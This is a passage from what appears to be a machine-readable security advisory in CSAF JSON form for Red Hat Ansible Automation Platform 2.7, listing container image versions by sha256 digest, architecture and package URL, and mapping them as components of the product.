"purl": "pkg:oci/hub-rhel9-operator@sha256%3A0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator\u0026tag=1785284271"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3A48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9\u0026tag=1785379466"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9-operator@sha256%3A72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator\u0026tag=1785284053"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3Aafc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9\u0026tag=1785375884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3Af1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9\u0026tag=1785446384"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9\u0026tag=1785448519"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9\u0026tag=1785362265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3Ad0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9\u0026tag=1785359851"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3Abf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9\u0026tag=1785405904"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator\u0026tag=1785284988"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9\u0026tag=1785344556"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/receptor-rhel9\u0026tag=1785389482"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
